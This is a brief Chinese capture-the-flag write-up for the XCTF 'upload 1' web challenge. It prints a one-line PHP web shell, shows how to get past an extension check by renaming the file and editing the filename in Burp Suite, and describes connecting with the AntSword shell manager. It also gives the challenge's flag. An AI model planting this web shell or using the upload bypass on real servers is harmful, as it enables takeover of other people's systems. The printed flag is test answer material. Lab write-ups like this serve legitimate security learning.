XCTF-Web|upload 1详细WriteUp
获取在线场景,得到:
联想可能是要上传webshell。于是编写一句话木马脚本:
<?php @eval($_POST['flag']);?>
当直接上传.php文件时,显示:
可知需要修改文件后缀,成为图片格式
将一句话木马的文件后缀改为.png或.jpg
选择文件,开启burpsuite拦截器,上传文件:
在filename处修改文件后缀名为.php,全选数据包后右键,点击send to repeater。在repeater页面点击Go按钮:
如图荧光笔位置显示出一句话木马成功上传的位置
此时用中国蚁剑进行连接:注意url地址一定是php上传的位置!,连接密码是php中自定义的密码
右键url点击文件管理,即可看到目录
打开flag.php
得到最终的flag值:
cyberpeace{9575ab47a40043e26f97c3f844640e55}